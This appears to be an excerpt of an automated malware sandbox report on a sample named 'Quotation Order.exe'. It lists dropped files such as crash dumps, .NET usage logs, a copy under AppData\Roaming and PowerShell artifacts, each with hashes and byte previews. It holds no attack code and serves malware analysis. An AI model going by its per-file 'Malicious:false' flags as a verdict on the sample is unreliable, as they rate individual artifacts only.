                                                                                                                                                                                                                                                  MD5:2723D9AD4B738071EE4CB6505B6DC43D
                                                                                                                                                                                                                                                  SHA1:9DA9D44CC5A1B23048E1005F23E063D2049DD460
                                                                                                                                                                                                                                                  SHA-256:40D356CF449B351CA12EDE5379A5206B7CBB9EB13AA476033A60309ADFADA74E
                                                                                                                                                                                                                                                  SHA-512:7E1394B7BA13E0E107DDDC1411DEE273CEED8256A3D096F6EA6FCCA75E61EFCA154A768CA7A65DED8C981DA1425DBC05CCEF89740993C8DDF4D0D13357B847C4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER46C7.tmp.dmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 08:07:21 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):515288
                                                                                                                                                                                                                                                  Entropy (8bit):3.3057527489015825
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:GIM5Xsm4EXjS0X/k8CPkwxPRN3XEpJ7A5H8r4SlKCgcS3FMnja1CCq9eSXVL3+vv:GIuL20vHYLz18rfsG4q9eSXVL3QoGq/
                                                                                                                                                                                                                                                  MD5:AF0D7662CDCD84AA1A3FBDE38A0B4468
                                                                                                                                                                                                                                                  SHA1:84A959DEFB79D8750DB18F7E8F7B220DA0921F0D
                                                                                                                                                                                                                                                  SHA-256:87A6E256E73F682A79206C8E8767FBD474572F36CF06FF3C542C138512560431
                                                                                                                                                                                                                                                  SHA-512:A972A3A9594909D2704C37AC9057C4E5386DD1E011BD451ADA12164BA2B0B38FC1910750CFB53DFD284534331CB4F94663E11CB6FC0759C88187C102D1EA13A1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MDMP..a..... ........`+f........................<...........$....)......T ..$).......S..............l.......8...........T............=..8...........xI..........dK..............................................................................eJ.......K......Lw......................T............`+f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER48EB.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8596
                                                                                                                                                                                                                                                  Entropy (8bit):3.7051628782199044
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJXVS6YW4OhwgmfHML03prG89bnyvafmdAm:R6lXJlS6Yp+wgmfsLsnyyfgl
                                                                                                                                                                                                                                                  MD5:13943C5B66A67AE7D6A121769526F507
                                                                                                                                                                                                                                                  SHA1:9B2EB3CDF8A0C459D26B74B45DF754BA45B4DCFE
                                                                                                                                                                                                                                                  SHA-256:6B1ABD419490721130776410E47B8001A97BA862FF167F7C4EF7EEB45596B7ED
                                                                                                                                                                                                                                                  SHA-512:6991C8BF0968D79AE068221D886DC90668D00F6110EDA521016864487262D98DC6E382561CD3CA43EA2BD3C5795491514115CDFB56E344FDC579E52F360F9EA4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.1.2.<./.P.i.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER491B.tmp.xml

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4756
                                                                                                                                                                                                                                                  Entropy (8bit):4.498054788199387
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsvJg771I9gLWpW8VYaSYm8M4JCfRFkyq85bDPhVwd:uIjfRI7f67VhbJCAOPhVwd
                                                                                                                                                                                                                                                  MD5:A40D62CEF498685E998174B235A562A7
                                                                                                                                                                                                                                                  SHA1:6D065A06363A625EFCF9E0883BFA8A52070EEEBB
                                                                                                                                                                                                                                                  SHA-256:BBAFF30FD80EA699B6E487EC45E91E8C032C96610776A2672836CD75659C9026
                                                                                                                                                                                                                                                  SHA-512:7FB21548B3DE0CFE7269B5FAD955F45AD8103DE8E41EC42CB8F9A933C7CCAE3C1A79B3BA535333E2B7D717AB5A03D253D04FD55458DBAC2B2B9B495F1424425E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296590" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER493C.tmp.csv

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):89316
                                                                                                                                                                                                                                                  Entropy (8bit):3.088440007017623
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:CJ1A5FA9bdKlxd+U+/zG/W+8BuaXb692BXWAJQpEnodhQ/S+fH:CJ1A5FA9bdKlxd+U+/zG/W+8BuaXb69Q
                                                                                                                                                                                                                                                  MD5:FF492D46E8F555BD66E1ECF92134F46E
                                                                                                                                                                                                                                                  SHA1:D5309BA151A48978505B089959BB813FB4698ACF
                                                                                                                                                                                                                                                  SHA-256:9D54EA09B6E4A8F8FF897DB374DF2E0580AD30871D9887EEC3144D7D84689765
                                                                                                                                                                                                                                                  SHA-512:888B1FC8E22E14A0C136885FC5782F2B1A1536C47AB438AA3E287E463275D250B08929B581BA14C733744EB72C932E9F909AA41DDF39F9C6F69926761B32E30B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A18.tmp.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.6857806744965216
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWxkA4GakYraYHdWPEH1UYEZJjt+iIk3X7YwiR1jRCaJFJM4Co1Ihnl3:2ZDxjMalkRnCaJFJM4CoKhnl3
                                                                                                                                                                                                                                                  MD5:CA8AB2D0C4ED3F4349C77AB892793F54
                                                                                                                                                                                                                                                  SHA1:976A1635D5E49F0CFECFF84FB8CFF9BE0065E390
                                                                                                                                                                                                                                                  SHA-256:A98919178A110DC5577B10E11BF3BA58B5846D362FB7A05BC6A5FB3E0572A2D0
                                                                                                                                                                                                                                                  SHA-512:4295756928A4DC46E1A5C5A68EDB7D2E6BE0DEBDA71A24DCAC66E04D9C770EF4E7645D4F8FED6E2926C6C3EEACBAC11B0ED8CDC78B58ADA519B1C6A76CC11D00
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8973.tmp.csv

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):88854
                                                                                                                                                                                                                                                  Entropy (8bit):3.089108828855378
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:8qdRokX0XmnzdhXlG5Rrz8mbaRKdbasrvK+h+lS+u+aoN+f+X+P+sJ6aG84S:8qdRokX0XmnzdhXlG5Rrz8mbaRKdbasV
                                                                                                                                                                                                                                                  MD5:BE15FCB97D4D51EC1E07E629974C4CAC
                                                                                                                                                                                                                                                  SHA1:812D56678611702B810B6D3518CCD00C257B81F2
                                                                                                                                                                                                                                                  SHA-256:70EBEC4B3F084C716C79413B1BB71E3D70236257C5D24B9D6DA9ECFE794591FA
                                                                                                                                                                                                                                                  SHA-512:C15213B2D7E87B75352FC20FF005B20203885897BDEDED8260C007FC5303E148BECB2CFADD8B12BB1E2026A9349840ADA53F5BC0E0EC08144CEFA820554A7449
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A4F.tmp.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.6868564786189526
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWbHlEvriUYiZYRWPkHFUYEZCntnBiLV7/dYwfIDGXWHavFGMrdowICnl3:2ZDbKFKfKWavFGMrdoHCnl3
                                                                                                                                                                                                                                                  MD5:B6F08644FF3ED85F4DC07C81E158C8D6
                                                                                                                                                                                                                                                  SHA1:35C5E273DB69E584950E7A56CD6401BA1D966724
                                                                                                                                                                                                                                                  SHA-256:2D57C1B09267B6223F204C4EB187A2DD7D9E8AAA35EC8B5530B9964C99ED7445
                                                                                                                                                                                                                                                  SHA-512:3426411A2C30342528D91D081CC49FC04B8FC1A0D5EC902A98AF77562F18917839F51A60C09AA6A331CD985AC0D5636F88F030542BC7A95B91BB8AA0E7C3617C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                  C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):999
                                                                                                                                                                                                                                                  Entropy (8bit):4.966299883488245
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                                                                                                                                                                                                                                  MD5:24567B9212F806F6E3E27CDEB07728C0
                                                                                                                                                                                                                                                  SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                                                                                                                                                                                                                                  SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                                                                                                                                                                                                                                  SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Quotation Order.exe.log

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Quotation Order.exe
                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                  Entropy (8bit):5.376949986661823
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclKsXE4Np51qE4GIs0E4KD:MxHKQwYHKGSI6o6+vxp3/elZHNp51qHa
                                                                                                                                                                                                                                                  MD5:8184A57469229249530A85C1C7AB6B68
                                                                                                                                                                                                                                                  SHA1:3EB26CA872ADFD1B7910A9E3E3C8DB250CC812F9
                                                                                                                                                                                                                                                  SHA-256:B22F01A3D672B90C06D5E9DEBD3141D9F82118C5EE6D1AC952CFE218E73320DD
                                                                                                                                                                                                                                                  SHA-512:F2006A0CC5E2D02045CF28465B629991302354FE99CD65907EF16D22F811A680CEED7D5F364C9419E13DB22EA3CAA144505D60E14E362A1E42E19494A846C09B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.3031

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\avdfUcC.exe.log

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):411
                                                                                                                                                                                                                                                  Entropy (8bit):5.331640912793073
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:Q3La/hSoDLI4MWuCIAWDLI4MWuCqDLI4MWuPTAv:MLbAE4KdAmE4K5E4KO
                                                                                                                                                                                                                                                  MD5:41DE845B592D0C0A18195E5AAB7B2A8D
                                                                                                                                                                                                                                                  SHA1:AB0656E0E0137593BE7984F44B4603407C6F7A32
                                                                                                                                                                                                                                                  SHA-256:ECC1BC8EFC8E479E0D7E1B4934F298B074A1D5AACAA3A73490CCCF2BFF440908
                                                                                                                                                                                                                                                  SHA-512:F4F84F2E23A2A11D6FB0BC00384A051B7811E65DD2DE9CE4CF2923247B5721A3A0B8DB335959B15EBCD15F7A8E5E530E452B8A5A537F3C16D70BFFC6C6A654F9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.AddIn, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1otcruym.y4i.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
